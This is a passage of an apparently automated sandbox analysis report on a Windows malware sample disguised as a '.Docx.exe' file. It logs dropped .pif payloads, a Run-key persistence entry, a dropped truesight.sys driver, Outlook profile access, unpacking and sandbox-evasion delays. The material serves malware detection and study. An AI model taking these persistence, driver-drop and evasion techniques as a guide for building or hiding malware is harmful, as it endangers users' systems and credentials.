          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: mssip32.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: smartscreenps.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: winhttpcom.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: webio.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ??????????.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: xzeheenC.pif, 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218B2000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218E1000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.0000000000773000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.0000000000826000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack
          Source: Yara matchFile source: 0.2.D.G Governor Istek,Docx.exe.29c0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2280883342.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2245824423.0000000002366000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2157901937.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: xzeheenC.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029D87A0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C32FC push eax; ret 0_2_029C3338
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC2FC push 029EC367h; ret 0_2_029EC35F
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C635C push 029C63B7h; ret 0_2_029C63AF
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C635A push 029C63B7h; ret 0_2_029C63AF
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC0AC push 029EC125h; ret 0_2_029EC11D
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC1F8 push 029EC288h; ret 0_2_029EC280
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC144 push 029EC1ECh; ret 0_2_029EC1E4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D86C0 push 029D8702h; ret 0_2_029D86FA
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C673E push 029C6782h; ret 0_2_029C677A
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C6740 push 029C6782h; ret 0_2_029C677A
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CC4F4 push ecx; mov dword ptr [esp], edx0_2_029CC4F9
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DE5B4 push ecx; mov dword ptr [esp], edx0_2_029DE5B9
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CD528 push 029CD554h; ret 0_2_029CD54C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CCB56 push 029CCCFAh; ret 0_2_029CCCF2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CCB74 push 029CCCFAh; ret 0_2_029CCCF2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EBB6C push 029EBD94h; ret 0_2_029EBD8C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D7894 push 029D7911h; ret 0_2_029D7909
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D68D0 push 029D697Bh; ret 0_2_029D6973
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D68CE push 029D697Bh; ret 0_2_029D6973
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA91F push 029DA958h; ret 0_2_029DA950
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8918 push 029D8950h; ret 0_2_029D8948
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8916 push 029D8950h; ret 0_2_029D8948
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA920 push 029DA958h; ret 0_2_029DA950
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2EE8 push 029D2F5Eh; ret 0_2_029D2F56
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D5E04 push ecx; mov dword ptr [esp], edx0_2_029D5E06
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2FF4 push 029D3041h; ret 0_2_029D3039
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2FF3 push 029D3041h; ret 0_2_029D3039
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00423149 push eax; ret 4_2_00423179
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004231C8 push eax; ret 4_2_00423179
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\xzeheenC.pifJump to dropped file
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\Cneehezx.PIFJump to dropped file
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CneehezxJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029DA95C
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29C0000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29C1000 memory commit 500178944Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29EC000 memory commit 500002816Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29ED000 memory commit 500199424Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2A1E000 memory commit 501014528Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2B16000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2B18000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2940000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2941000 memory commit 500178944Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 296C000 memory commit 500002816Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 296D000 memory commit 500199424Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 299E000 memory commit 501014528Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2A96000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2A98000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD0000 memory commit 500006912
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD1000 memory commit 500178944
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AFC000 memory commit 500002816
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AFD000 memory commit 500199424
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2B2E000 memory commit 501014528
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2C26000 memory commit 500006912
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2C28000 memory commit 500015104
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1CDB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1D2F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1D070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 340F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 34550000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 341B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 307E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30D70000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30AD0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599219Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598870Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598750Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598406Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598297Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597469Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597024Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596782Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596657Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595391Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594688Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594563Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599325Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598984Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598765Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598296Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598061Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597891Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597767Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597655Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597539Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596969Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735Jump to behavior
